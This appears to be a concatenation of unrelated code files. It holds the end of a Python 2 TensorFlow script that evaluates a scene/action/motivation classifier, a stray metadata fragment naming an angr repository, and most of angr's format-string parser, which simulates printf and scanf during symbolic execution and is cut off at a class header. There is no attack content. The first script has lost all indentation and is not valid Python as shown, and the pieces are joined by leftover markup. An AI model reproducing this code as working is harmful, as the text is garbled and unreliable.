gpu_num = 1
def placeholder_inputs(batch_size):
#bulit placeholder_inputs
actions_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.INPUT_SIZE,
))
scenes_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.INPUT_SIZE,
))
motivations_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.INPUT_SIZE,
))
ac_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
sc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
mc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
keep_pro = tf.placeholder(tf.float32)
return actions_placeholder,scenes_placeholder,motivations_placeholder,ac_labels_placeholder,sc_labels_placeholder,mc_labels_placeholder,keep_pro
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def tower_loss(name_scope, logit, labels, classic):
labels=tf.one_hot(labels,classic,on_value=1,off_value=None,axis=1)
#print labels.shape
cross_entropy_mean = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=labels,logits=logit)
)
tf.summary.scalar(
name_scope + '_cross_entropy',
cross_entropy_mean
)
weight_decay_loss = tf.get_collection('weightdecay_losses')
tf.summary.scalar(name_scope + '_weight_decay_loss', tf.reduce_mean(weight_decay_loss) )
# Calculate the total loss for the current tower.
total_loss = cross_entropy_mean
tf.summary.scalar(name_scope + '_total_loss', tf.reduce_mean(total_loss) )
return total_loss
def tower_acc(logit, labels):
correct_pred = tf.equal(tf.argmax(logit, 1), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return accuracy
def topk_acc(logit, labels, k):
in_topk = tf.nn.in_top_k(logit, labels, k)
in_top1 = tf.to_float(in_topk)
num_correct = tf.reduce_sum(in_top1)
return num_correct / FLAGS.batch_size
def _variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
var = tf.get_variable(name, shape, initializer=initializer)
return var
def _variable_with_weight_decay(name, shape, wd):
var = _variable_on_cpu(name, shape, tf.contrib.layers.xavier_initializer())
if wd is not None:
weight_decay = tf.nn.l2_loss(var)*wd
tf.add_to_collection('weightdecay_losses', weight_decay)
return var
def run_training():
# Get the sets of images and labels for training, validation, and
# Tell TensorFlow that the model will be built into the default Graph.
# Create model directory
with tf.Graph().as_default():
global_step = tf.get_variable(
'global_step',
[],
initializer=tf.constant_initializer(0),
trainable=False
)
actions_placeholder,scenes_placeholder,motivations_placeholder,ac_labels_placeholder,sc_labels_placeholder,mc_labels_placeholder,keep_pro = placeholder_inputs(
FLAGS.batch_size * gpu_num
)
tower_grads1 = []
tower_grads2 = []
tower_grads3 = []
sc_logits = []
ac_logits = []
mc_logits = []
learning_rate_sc=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.98,staircase=True)
learning_rate_ac=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.98,staircase=True)
learning_rate_mc=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.98,staircase=True)
tf.summary.scalar('learning_rate', learning_rate_sc)
#tf.summary.scalar('learning_rate2', learning_rate2)
opt_sc = tf.train.AdamOptimizer(learning_rate_sc)
opt_ac = tf.train.AdamOptimizer(learning_rate_ac)
opt_mc = tf.train.AdamOptimizer(learning_rate_mc)
with tf.variable_scope('var_name') as var_scope:
sc_weights = {
'w1': _variable_with_weight_decay('sc_w1', [4800, 4096], 0.005),
'w2': _variable_with_weight_decay('sc_w2', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('sc_wout', [2048, model.SCNUM_CLASSES], 0.005)
}
sc_biases = {
'b1': _variable_with_weight_decay('sc_b1', [4096], 0.000),
'b2': _variable_with_weight_decay('sc_b2', [2048], 0.000),
'out': _variable_with_weight_decay('sc_bout', [model.SCNUM_CLASSES], 0.000),
}
ac_weights = {
'w1': _variable_with_weight_decay('ac_w1', [4800, 4096], 0.005),
'w2': _variable_with_weight_decay('ac_w2', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('ac_wout', [2048, model.ACNUM_CLASSES], 0.005),
'W_alpha': _variable_with_weight_decay('alpha_learn', [100,100], 0.005),
'W_Ua': _variable_with_weight_decay('Ua', [100,100], 0.005),
}
ac_biases = {
'b1': _variable_with_weight_decay('ac_b1', [4096], 0.000),
'b2': _variable_with_weight_decay('ac_b2', [2048], 0.000),
'out': _variable_with_weight_decay('ac_bout', [model.ACNUM_CLASSES], 0.000),
}
mc_weights = {
'w1': _variable_with_weight_decay('mc_w1', [4800, 4096], 0.005),
'w2': _variable_with_weight_decay('mc_w2', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('mc_wout', [2048, model.MCNUM_CLASSES], 0.005),
'W_beta': _variable_with_weight_decay('beta_learn', [256,100], 0.005),
'W_gama': _variable_with_weight_decay('gama_learn', [256,100], 0.005),
'W_Um': _variable_with_weight_decay('Um', [256,256], 0.005),
}
mc_biases = {
'b1': _variable_with_weight_decay('mc_b1', [4096], 0.000),
'b2': _variable_with_weight_decay('mc_b2', [2048], 0.000),
'out': _variable_with_weight_decay('mc_bout', [model.MCNUM_CLASSES], 0.000),
}
for gpu_index in range(0, gpu_num):
with tf.device('/gpu:%d' % gpu_index):
varlist1 = list(sc_weights.values()) + list(sc_biases.values())
varlist2 = list(ac_weights.values()) + list(ac_biases.values())
varlist3 = list(mc_weights.values()) + list(mc_biases.values())
alpha = ac_weights['W_alpha']
beta = mc_weights['W_beta']
gama = mc_weights['W_gama']
sc_logit = model.sc_model(
scenes_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:],
keep_pro,
FLAGS.batch_size,
sc_weights,
sc_biases
)
ac_logit = model.ac_model(
actions_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:],
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
keep_pro,
FLAGS.batch_size,
ac_weights,
ac_biases
)
mc_logit = model.mc_model(
motivations_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:],
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
ac_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
keep_pro,
FLAGS.batch_size,
mc_weights,
mc_biases
)
loss_name_scope = ('gpud_%d_loss' % gpu_index)
sc_loss = tower_loss(
loss_name_scope+'_scene',
sc_logit,
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
model.SCNUM_CLASSES
)
ac_loss = tower_loss(
loss_name_scope+'_action',
ac_logit,
ac_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
model.ACNUM_CLASSES
)
mc_loss = tower_loss(
loss_name_scope+'_motivation',
mc_logit,
mc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
model.MCNUM_CLASSES
)
grads1 = opt_sc.compute_gradients(sc_loss, varlist1)
grads2 = opt_ac.compute_gradients(ac_loss, varlist2)
grads3 = opt_mc.compute_gradients(mc_loss, varlist3)
tower_grads1.append(grads1)
tower_grads2.append(grads2)
tower_grads3.append(grads3)
sc_logits.append(sc_logit)
ac_logits.append(ac_logit)
mc_logits.append(mc_logit)
sc_logits = tf.concat(sc_logits,0)
sc_predictions = tf.nn.top_k(sc_logits,5)
ac_logits = tf.concat(ac_logits,0)
ac_predictions = tf.nn.top_k(ac_logits,5)
mc_logits = tf.concat(mc_logits,0)
mc_predictions = tf.nn.top_k(mc_logits,5)
#sc_accuracy = tower_acc(sc_logits, sc_labels_placeholder)
sc_accuracy = topk_acc(sc_logits, sc_labels_placeholder ,5)
tf.summary.scalar('sc_accuracy', sc_accuracy)
#ac_accuracy = tower_acc(ac_logits, ac_labels_placeholder)
ac_accuracy = topk_acc(ac_logits, ac_labels_placeholder ,5)
tf.summary.scalar('ac_accuracy', ac_accuracy)
#mc_accuracy = tower_acc(mc_logits, mc_labels_placeholder)
mc_accuracy = topk_acc(mc_logits, mc_labels_placeholder ,5)
tf.summary.scalar('mc_accuracy', mc_accuracy)
grads1 = average_gradients(tower_grads1)
grads2 = average_gradients(tower_grads2)
grads3 = average_gradients(tower_grads3)
apply_gradient_sc = opt_sc.apply_gradients(grads1, global_step=global_step)
apply_gradient_ac = opt_ac.apply_gradients(grads2, global_step=global_step)
apply_gradient_mc = opt_mc.apply_gradients(grads3, global_step=global_step)
train_sc = tf.group(apply_gradient_sc)
train_ac = tf.group(apply_gradient_ac)
train_mc = tf.group(apply_gradient_mc)
null_op = tf.no_op()
# Create a saver for writing training checkpoints.
saver = tf.train.Saver(list(sc_weights.values()) + list(sc_biases.values()) + list(ac_weights.values()) + list(ac_biases.values()) + list(mc_weights.values()) + list(mc_biases.values()))
init = tf.global_variables_initializer()
# Create a session for running Ops on the Graph.
sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True)
)
sess.run(init)
ckpt = tf.train.get_checkpoint_state(pre_model_save_dir)
if ckpt and ckpt.model_checkpoint_path:
print "loading checkpoint,waiting......"
saver.restore(sess, ckpt.model_checkpoint_path)
print "load complete!"
next_strat_pos=0
sc_predict_labels=[]
ac_predict_labels=[]
mc_predict_labels=[]
for step in xrange(FLAGS.max_steps):
start_time = time.time()
print('TEST Data Eval:')
val_actions,val_scenes,val_motivations,val_ac_labels,val_sc_labels,val_mc_labels,next_strat_pos, _= input_data(
filename='./list/test.list',
start_pos=next_strat_pos,
batch_size=FLAGS.batch_size * gpu_num,
shuffle=False)
sc_predict,ac_predict,mc_predict,sc_acc,ac_acc,mc_acc,sc_loss_value,ac_loss_value,mc_loss_value,A,B,G = sess.run(
[sc_predictions,ac_predictions,mc_predictions,sc_accuracy,ac_accuracy,mc_accuracy,sc_loss,ac_loss,mc_loss,alpha,beta,gama],
feed_dict={
actions_placeholder: val_actions,
scenes_placeholder:val_scenes,
motivations_placeholder:val_motivations,
ac_labels_placeholder: val_ac_labels,
sc_labels_placeholder: val_sc_labels,
mc_labels_placeholder: val_mc_labels,
keep_pro : 1
})
print ("sc_accuracy: " + "{:.5f}".format(sc_acc))
print 'sc_loss= %.2f'% np.mean(sc_loss_value)
print ("ac_accuracy: " + "{:.5f}".format(ac_acc))
print 'ac_loss= %.2f'% np.mean(ac_loss_value)
print ("mc_accuracy: " + "{:.5f}".format(mc_acc))
print 'mc_loss= %.2f'% np.mean(mc_loss_value)
np.save("alpha.npy",A)
np.save("beta.npy",B)
np.save("gama.npy",G)
#print (ac_predict)
for i in range(FLAGS.batch_size):
sc_predict_labels.append(sc_predict[1][i])
ac_predict_labels.append(ac_predict[1][i])
mc_predict_labels.append(mc_predict[1][i])
duration = time.time() - start_time
print('Batchnum %d: %.3f sec' % (step+1, duration))
break
#print predict_labels
#print val_mc_labels
print("get_predict_label_done!")
return sc_predict_labels,ac_predict_labels,mc_predict_labels
def main(_):
#for i in range(model.MCNUM_CLASSES):
# if not os.path.exist('./test/%d.txt'%i):
lines = open('./list/test.list','r')
lines = list(lines)
datasets = open('./dataset.txt','r')
datasets = list(datasets)
cluster_256=np.load('./clusters_256.npz')
cluster_100=np.load('./clusters_100.npz')
sc_label_list,ac_label_list,mc_label_list=run_training()
print (sc_label_list)
print (ac_label_list)
print (mc_label_list)
for i in range(len(sc_label_list)):
line = lines[i].strip('\n').split('\t')
dirname=line[0]
line_num = line[2]
dataset=datasets[int(line_num)].strip('\n').split('\t')
action=dataset[1]
scene=dataset[3]
motivation=dataset[2]
tmp_ac_label = cluster_100['ac'][int(line_num)]
tmp_sc_label = cluster_100['sc'][int(line_num)]
tmp_mc_label = cluster_256['mc'][int(line_num)]
with open('./test/step1/predict.txt', 'a+') as f:
f.write(dirname+'\t'+action+'\t'+motivation+'\t'+scene+'\t'+'ac_ground_truth:'+str(tmp_ac_label)+'\t'+'ac_predict:'+str(ac_label_list[i])+'\t'+'mc_ground_truth:'+str(tmp_mc_label)+'\t'+'mc_predict:'+str(mc_label_list[i])+'\t'+'sc_ground_truth:'+str(tmp_sc_label)+'\t'+'sc_predict:'+str(sc_label_list[i])+'\n')
if __name__ == '__main__':
tf.app.run()
``` |
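`topk_acc` above reports the fraction of samples whose ground-truth label lands among the k largest logits. A standalone NumPy sketch of the same computation, with made-up values:

```python
import numpy as np

def topk_acc_np(logits, labels, k=5):
    # fraction of rows whose true label appears among the k largest logits
    topk = np.argsort(logits, axis=1)[:, -k:]
    hits = [label in row for label, row in zip(labels, topk)]
    return float(np.mean(hits))

logits = np.array([[0.1, 0.5, 0.2, 0.9],
                   [0.7, 0.2, 0.06, 0.04]])
labels = np.array([3, 2])
print(topk_acc_np(logits, labels, k=2))  # 0.5: first row is a hit, second is not
```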
{
"source": "13579and2468/angr",
"score": 3
} |
#### File: procedures/stubs/format_parser.py
```python
from typing import List, Dict, TYPE_CHECKING
from string import digits as ascii_digits
import logging
import math
import claripy
from ... import sim_type
from ...sim_procedure import SimProcedure
from ...storage.file import SimPackets
if TYPE_CHECKING:
from angr.sim_type import SimType
l = logging.getLogger(name=__name__)
ascii_digits = ascii_digits.encode()
class FormatString:
"""
Describes a format string.
"""
SCANF_DELIMITERS = [b"\x09", b"\x0a", b"\x0b", b"\x0d", b"\x20"]
def __init__(self, parser, components):
"""
Takes a list of components which are either just strings or a FormatSpecifier.
"""
self.components = components
self.parser = parser
self.string = None
@property
def state(self):
return self.parser.state
@staticmethod
def _add_to_string(string, c):
if c is None:
return string
if string is None:
return c
return string.concat(c)
def _get_str_at(self, str_addr, max_length=None):
if max_length is None:
strlen = self.parser._sim_strlen(str_addr)
#TODO: we probably could do something more fine-grained here.
# throw away strings which are just the NULL terminator
max_length = self.parser.state.solver.max_int(strlen)
if max_length == 0:
return claripy.BVV(b'')
return self.parser.state.memory.load(str_addr, max_length)
def replace(self, startpos, args):
"""
Implement printf - based on the stored format specifier information, format the values from the arg getter function `args` into a string.
:param startpos: The index of the first argument to be used by the first element of the format string
:param args: A function which, given an argument index, returns the integer argument to the current function at that index
:return: The result formatted string
"""
argpos = startpos
string = None
for component in self.components:
# if this is just concrete data
if isinstance(component, bytes):
string = self._add_to_string(string, self.parser.state.solver.BVV(component))
elif isinstance(component, str):
raise Exception("this branch should be impossible?")
elif isinstance(component, claripy.ast.BV): # pylint:disable=isinstance-second-argument-not-valid-type
string = self._add_to_string(string, component)
else:
# okay now for the interesting stuff
# what type of format specifier is it?
fmt_spec = component
if fmt_spec.spec_type == b's':
if fmt_spec.length_spec == b".*":
str_length = args(argpos)
argpos += 1
else:
str_length = None
str_ptr = args(argpos)
string = self._add_to_string(string, self._get_str_at(str_ptr, max_length=str_length))
# integers, for most of these we'll end up concretizing values..
else:
i_val = args(argpos)
c_val = int(self.parser.state.solver.eval(i_val))
c_val &= (1 << (fmt_spec.size * 8)) - 1
if fmt_spec.signed and (c_val & (1 << ((fmt_spec.size * 8) - 1))):
c_val -= (1 << fmt_spec.size * 8)
if fmt_spec.spec_type in (b'd', b'i'):
s_val = str(c_val)
elif fmt_spec.spec_type == b'u':
s_val = str(c_val)
elif fmt_spec.spec_type == b'c':
s_val = chr(c_val & 0xff)
elif fmt_spec.spec_type == b'x':
s_val = hex(c_val)[2:]
elif fmt_spec.spec_type == b'o':
s_val = oct(c_val)[2:]
elif fmt_spec.spec_type == b'p':
s_val = hex(c_val)
else:
raise SimProcedureError("Unimplemented format specifier '%s'" % fmt_spec.spec_type)
if isinstance(fmt_spec.length_spec, int):
s_val = s_val.rjust(fmt_spec.length_spec, fmt_spec.pad_chr)
string = self._add_to_string(string, self.parser.state.solver.BVV(s_val.encode()))
argpos += 1
return string
def interpret(self, startpos, args, addr=None, simfd=None):
"""
implement scanf - extract formatted data from memory or a file according to the stored format
specifiers and store them into the pointers extracted from `args`.
:param startpos: The index of the first argument corresponding to the first format element
:param args: A function which, given the index of an argument to the function, returns that argument
:param addr: The address in the memory to extract data from, or...
:param simfd: A file descriptor to use for reading data from
:return: The number of arguments parsed
"""
if simfd is not None and isinstance(simfd.read_storage, SimPackets):
argnum = startpos
for component in self.components:
if type(component) is bytes:
sdata, _ = simfd.read_data(len(component), short_reads=False)
self.state.add_constraints(sdata == component)
elif isinstance(component, claripy.Bits):
sdata, _ = simfd.read_data(len(component) // 8, short_reads=False)
self.state.add_constraints(sdata == component)
elif component.spec_type == b's':
if component.length_spec is None:
sdata, slen = simfd.read_data(self.state.libc.buf_symbolic_bytes)
else:
sdata, slen = simfd.read_data(component.length_spec)
for byte in sdata.chop(8):
self.state.add_constraints(claripy.And(*[byte != char for char in self.SCANF_DELIMITERS]))
self.state.memory.store(args(argnum), sdata, size=slen)
self.state.memory.store(args(argnum) + slen, claripy.BVV(0, 8))
argnum += 1
elif component.spec_type == b'c':
sdata, _ = simfd.read_data(1, short_reads=False)
self.state.memory.store(args(argnum), sdata)
argnum += 1
else:
bits = component.size * 8
if component.spec_type == b'x':
base = 16
elif component.spec_type == b'o':
base = 8
else:
base = 10
# here's the variable representing the result of the parsing
target_variable = self.state.solver.BVS('scanf_' + component.string.decode(), bits,
key=('api', 'scanf', argnum - startpos, component.string))
negative = claripy.SLT(target_variable, 0)
# how many digits does it take to represent this variable fully?
max_digits = int(math.ceil(math.log(2**bits, base)))
# how many digits does the format specify?
spec_digits = component.length_spec
# how many bits can we specify as input?
available_bits = float('inf') if spec_digits is None else spec_digits * math.log(base, 2)
not_enough_bits = available_bits < bits
# how many digits will we model this input as?
digits = max_digits if spec_digits is None else spec_digits
# constrain target variable range explicitly if it can't take on all possible values
if not_enough_bits:
self.state.add_constraints(self.state.solver.And(
self.state.solver.SLE(target_variable, (base**digits) - 1),
self.state.solver.SGE(target_variable, -(base**(digits - 1) - 1))))
# perform the parsing in reverse - constrain the input digits to be the string version of the input
# this only works because we're reading from a packet stream and therefore nobody has the ability
# to add other constraints to this data!
# this makes z3's job EXTREMELY easy
sdata, _ = simfd.read_data(digits, short_reads=False)
for i, digit in enumerate(reversed(sdata.chop(8))):
digit_value = (target_variable // (base**i)) % base
digit_ascii = digit_value + ord('0')
if base > 10:
digit_ascii = claripy.If(digit_value >= 10, digit_value + (-10 + ord('a')), digit_ascii)
# if there aren't enough bits, we can increase the range by accounting for the possibility that
# the first digit is a minus sign
if not_enough_bits:
if i == digits - 1:
neg_digit_ascii = ord('-')
else:
neg_digit_value = (-target_variable // (base**i)) % base
neg_digit_ascii = neg_digit_value + ord('0')
if base > 10:
neg_digit_ascii = claripy.If(neg_digit_value >= 10, neg_digit_value + (-10 + ord('a')), neg_digit_ascii)
digit_ascii = claripy.If(negative, neg_digit_ascii, digit_ascii)
self.state.add_constraints(digit == digit_ascii[7:0])
self.state.memory.store(args(argnum), target_variable, endness=self.state.arch.memory_endness)
argnum += 1
return argnum - startpos
if simfd is not None:
region = simfd.read_storage
addr = simfd._pos if hasattr(simfd, '_pos') else simfd._read_pos # XXX THIS IS BAD
else:
region = self.parser.state.memory
bits = self.parser.state.arch.bits
failed = self.parser.state.solver.BVV(0, bits)
argpos = startpos
position = addr
for component in self.components:
if isinstance(component, bytes):
# TODO we skip non-format-specifiers in format string interpretation for now
# if the region doesn't match the concrete component, we need to return immediately
pass
else:
fmt_spec = component
try:
dest = args(argpos)
except SimProcedureArgumentError:
dest = None
if fmt_spec.spec_type == b's':
# set some limits for the find
max_str_len = self.parser.state.libc.max_str_len
max_sym_bytes = self.parser.state.libc.buf_symbolic_bytes
# has the length of the format been limited by the string itself?
if fmt_spec.length_spec is not None:
max_str_len = fmt_spec.length_spec
max_sym_bytes = fmt_spec.length_spec
# TODO: look for limits on other characters which scanf is sensitive to, '\x00', '\x20'
_, _, match_indices = region.find(position, self.parser.state.solver.BVV(b'\n'), max_str_len,
max_symbolic_bytes=max_sym_bytes)
if not match_indices:
# if no newline is found, mm is position + max_strlen
mm = position + max_str_len
# we're just going to concretize the length, load will do this anyways
length = self.parser.state.solver.max_int(mm - position)
else:
# a newline is found, or a max length is specified with the specifier
length = max(match_indices)
src_str = region.load(position, length)
# TODO all of these should be delimiters we search for above
# add that the contents of the string cannot be any scanf %s string delimiters
for delimiter in set(FormatString.SCANF_DELIMITERS):
delim_bvv = self.parser.state.solver.BVV(delimiter)
for i in range(length):
self.parser.state.add_constraints(region.load(position + i, 1) != delim_bvv)
# write it out to the pointer
self.parser.state.memory.store(dest, src_str)
# store the terminating null byte
self.parser.state.memory.store(dest + length, self.parser.state.solver.BVV(0, 8))
position += length
else:
# XXX: atoi only supports strings of one byte
if fmt_spec.spec_type in [b'd', b'i', b'u', b'x']:
base = 16 if fmt_spec.spec_type == b'x' else 10
status, i, num_bytes = self.parser._sim_atoi_inner(position, region, base=base, read_length=fmt_spec.length_spec)
# increase failed count if we were unable to parse it
failed = self.parser.state.solver.If(status, failed, failed + 1)
position += num_bytes
elif fmt_spec.spec_type == b'c':
i = region.load(position, 1)
i = i.zero_extend(bits - 8)
position += 1
else:
raise SimProcedureError("unsupported format spec '%s' in interpret" % fmt_spec.spec_type)
i = self.parser.state.solver.Extract(fmt_spec.size*8-1, 0, i)
self.parser.state.memory.store(dest, i, size=fmt_spec.size, endness=self.parser.state.arch.memory_endness)
argpos += 1
if simfd is not None:
_, realsize = simfd.read_data(position - addr)
self.state.add_constraints(realsize == position - addr)
return (argpos - startpos) - failed
def __repr__(self):
outstr = ""
for comp in self.components:
if isinstance(comp, bytes):
outstr += comp.decode("ascii")
else:
outstr += (str(comp))
return outstr
class FormatSpecifier:
"""
Describes a format specifier within a format string.
"""
__slots__ = ('string', 'size', 'signed', 'length_spec', 'pad_chr', )
def __init__(self, string, length_spec, pad_chr, size, signed):
self.string = string
self.size = size
self.signed = signed
self.length_spec = length_spec
self.pad_chr = pad_chr
@property
def spec_type(self):
return self.string[-1:].lower()
def __str__(self):
return "%%%s" % self.string.decode()
def __len__(self):
return len(self.string)
class FormatParser(SimProcedure):
"""
For SimProcedures relying on printf-style format strings.
"""
ARGS_MISMATCH = True
# Basic conversion specifiers for format strings, mapped to sim_types
# TODO: support for C and S that are deprecated.
# TODO: We only consider POSIX locales here.
basic_spec = {
b'd': sim_type.SimTypeInt(), # 'int',
b'i': sim_type.SimTypeInt(), # 'int',
b'o': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'u': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'x': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'X': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'e': sim_type.SimTypeDouble(), # 'double',
b'E': sim_type.SimTypeDouble(), # 'double',
b'f': sim_type.SimTypeDouble(), # 'double',
b'F': sim_type.SimTypeDouble(), # 'double',
b'g': sim_type.SimTypeDouble(), # 'double',
b'G': sim_type.SimTypeDouble(), # 'double',
b'a': sim_type.SimTypeDouble(), # 'double',
b'A': sim_type.SimTypeDouble(), # 'double',
b'c': sim_type.SimTypeChar(), # 'char',
b's': sim_type.SimTypePointer(sim_type.SimTypeChar()), # 'char*',
b'p': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)), # 'uintptr_t',
b'n': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)), # 'uintptr_t', # pointer to num bytes written so far
#b'm': None, # Those don't expect any argument
#b'%': None, # Those don't expect any argument
}
# Signedness of integers
int_sign = {
'signed': [b'd', b'i'],
'unsigned' : [b'o', b'u', b'x', b'X']
}
# Length modifiers and how they apply to integer conversion (signed / unsigned).
int_len_mod = {
b'hh': (sim_type.SimTypeChar(), sim_type.SimTypeChar(signed=False)), # ('char', 'uint8_t'),
b'h' : (sim_type.SimTypeShort(), sim_type.SimTypeShort(signed=False)), # ('int16_t', 'uint16_t'),
b'l' : (sim_type.SimTypeLong(), sim_type.SimTypeLong(signed=False)), # ('long', 'unsigned long'),
# FIXME: long long is 64bit according to stdint.h on Linux, but that might not always be the case
b'll' : (sim_type.SimTypeLongLong(), sim_type.SimTypeLongLong(signed=False)), # ('int64_t', 'uint64_t'),
# FIXME: intmax_t seems to be always 64 bit, but not too sure
b'j' : (sim_type.SimTypeLongLong(), sim_type.SimTypeLongLong(signed=False)), # ('int64_t', 'uint64_t'),
b'z' : (sim_type.SimTypeLength(signed=True), sim_type.SimTypeLength(signed=False)), # ('ssize', 'size_t'),
b't' : (sim_type.SimTypeLong(), sim_type.SimTypeLong()), # ('ptrdiff_t', 'ptrdiff_t'),
}
# Types that are not known by sim_types
# Maps to (size, signedness)
other_types = {
('string',): lambda _:(0, True) # special value for strings, we need to count
}
# Those flags affect the formatting the output string
flags = ['#', '0', r'\-', r' ', r'\+', r'\'', 'I']
_MOD_SPEC = None
_ALL_SPEC = None
@property
def _mod_spec(self):
"""
Modified length specifiers: mapping between length modifiers and conversion specifiers. This generates all the
possibilities, i.e. hhd, etc.
"""
if FormatParser._MOD_SPEC is None:
mod_spec = { }
for mod, sizes in self.int_len_mod.items():
for conv in self.int_sign['signed']:
mod_spec[mod + conv] = sizes[0]
for conv in self.int_sign['unsigned']:
mod_spec[mod + conv] = sizes[1]
FormatParser._MOD_SPEC = mod_spec
return FormatParser._MOD_SPEC
@property
def _all_spec(self) -> Dict[bytes,'SimType']:
"""
All specifiers and their lengths.
"""
if FormatParser._ALL_SPEC is None:
base = dict(self._mod_spec)
for spec in self.basic_spec:
base[spec] = self.basic_spec[spec]
FormatParser._ALL_SPEC = base
return FormatParser._ALL_SPEC
# Tricky stuff
# Note that $ is not C99 compliant (but posix specific).
def _match_spec(self, nugget):
"""
match the string `nugget` to a format specifier.
"""
# TODO: handle positional modifiers and other similar format string tricks.
all_spec = self._all_spec
# iterate through nugget throwing away anything which is an int
# TODO store this in a size variable
original_nugget = nugget
length_str = [ ]
length_spec = None
length_spec_str_len = 0
pad_chr = " "
if nugget.startswith(b".*"):
# ".*": precision is specified as an argument
nugget = nugget[2:]
length_spec = b".*"
length_spec_str_len = 2
elif nugget.startswith(b"0"):
pad_chr = "0"
for j, c in enumerate(nugget):
if c in ascii_digits:
length_str.append(c)
else:
nugget = nugget[j:]
if length_spec is None:
length_spec = None if len(length_str) == 0 else int(bytes(length_str))
break
# we need the length of the format's length specifier to extract the format and nothing else
if length_spec_str_len == 0 and length_str:
length_spec_str_len = len(length_str)
# is it an actual format?
for spec in all_spec:
if nugget.startswith(spec):
# this is gross coz sim_type is gross..
nugget = nugget[:len(spec)]
original_nugget = original_nugget[:(length_spec_str_len + len(spec))]
nugtype: 'SimType' = all_spec[nugget]
try:
typeobj = nugtype.with_arch(self.state.arch if self.state is not None else self.project.arch)
except Exception:
raise SimProcedureError("format specifier uses unknown type '%s'" % repr(nugtype))
return FormatSpecifier(original_nugget, length_spec, pad_chr, typeobj.size // 8, typeobj.signed)
return None
def extract_components(self, fmt: List) -> List:
"""
Extract the actual formats from the format string `fmt`.
:param fmt: A list of format chars.
:returns: a FormatString object
"""
# iterate over the format string looking for format specifiers
components = [ ]
i = 0
while i < len(fmt):
if type(fmt[i]) is bytes and fmt[i] == b"%":
# Note that we only support concrete format specifiers
# grab the specifier
# go to the space
specifier = b""
for c in fmt[i+1:]:
if type(c) is bytes:
specifier += c
else:
break
specifier = self._match_spec(specifier)
if specifier is not None:
i += len(specifier)
components.append(specifier)
else:
# if we get here we didn't match any specs, the first char will be thrown away
# and we'll add the percent
i += 1
components.append(b'%')
else:
# claripy ASTs, which are usually symbolic variables
# They will be kept as they are - even if those chars can be evaluated to "%"
components.append(fmt[i])
i += 1
return components
def _get_fmt(self, fmt):
"""
Extract the actual formats from the format string `fmt`.
:param list fmt: A list of format chars.
:returns: a FormatString object
"""
components = self.extract_components(fmt)
return FormatString(self, components)
def _sim_atoi_inner(self, str_addr, region, base=10, read_length=None):
"""
Return the result of invoking the atoi simprocedure on `str_addr`.
"""
from .. import SIM_PROCEDURES # pylint:disable=import-outside-toplevel
strtol = SIM_PROCEDURES['libc']['strtol']
return strtol.strtol_inner(str_addr, self.state, region, base, True, read_length=read_length)
def _sim_strlen(self, str_addr):
"""
Return the result of invoking the strlen simprocedure on `str_addr`.
"""
from .. import SIM_PROCEDURES # pylint:disable=import-outside-toplevel
strlen = SIM_PROCEDURES['libc']['strlen']
return self.inline_call(strlen, str_addr).ret_expr
def _parse(self, fmt_idx):
"""
Parse format strings.
:param fmt_idx: The index of the (pointer to the) format string in the arguments list.
:returns: A FormatString object which can be used for replacing the format specifiers with arguments or
for scanning into arguments.
"""
fmtstr_ptr = self.arg(fmt_idx)
if self.state.solver.symbolic(fmtstr_ptr):
raise SimProcedureError("Symbolic pointer to (format) string :(")
length = self._sim_strlen(fmtstr_ptr)
if self.state.solver.symbolic(length):
all_lengths = self.state.solver.eval_upto(length, 2)
if len(all_lengths) != 1:
raise SimProcedureError("Symbolic (format) string, game over :(")
length = all_lengths[0]
if self.state.solver.is_true(length == 0):
return FormatString(self, [b""])
fmt_xpr = self.state.memory.load(fmtstr_ptr, length)
fmt = [ ]
for i in range(fmt_xpr.size(), 0, -8):
char = fmt_xpr[i - 1 : i - 8]
try:
conc_char = self.state.solver.eval_one(char)
except SimSolverError:
# For symbolic chars, just keep them symbolic
fmt.append(char)
else:
# Concrete chars are directly appended to the list
fmt.append(bytes([conc_char]))
# make a FormatString object
fmt_str = self._get_fmt(fmt)
l.debug("Fmt: %r", fmt_str)
return fmt_str
class ScanfFormatParser(FormatParser):
"""
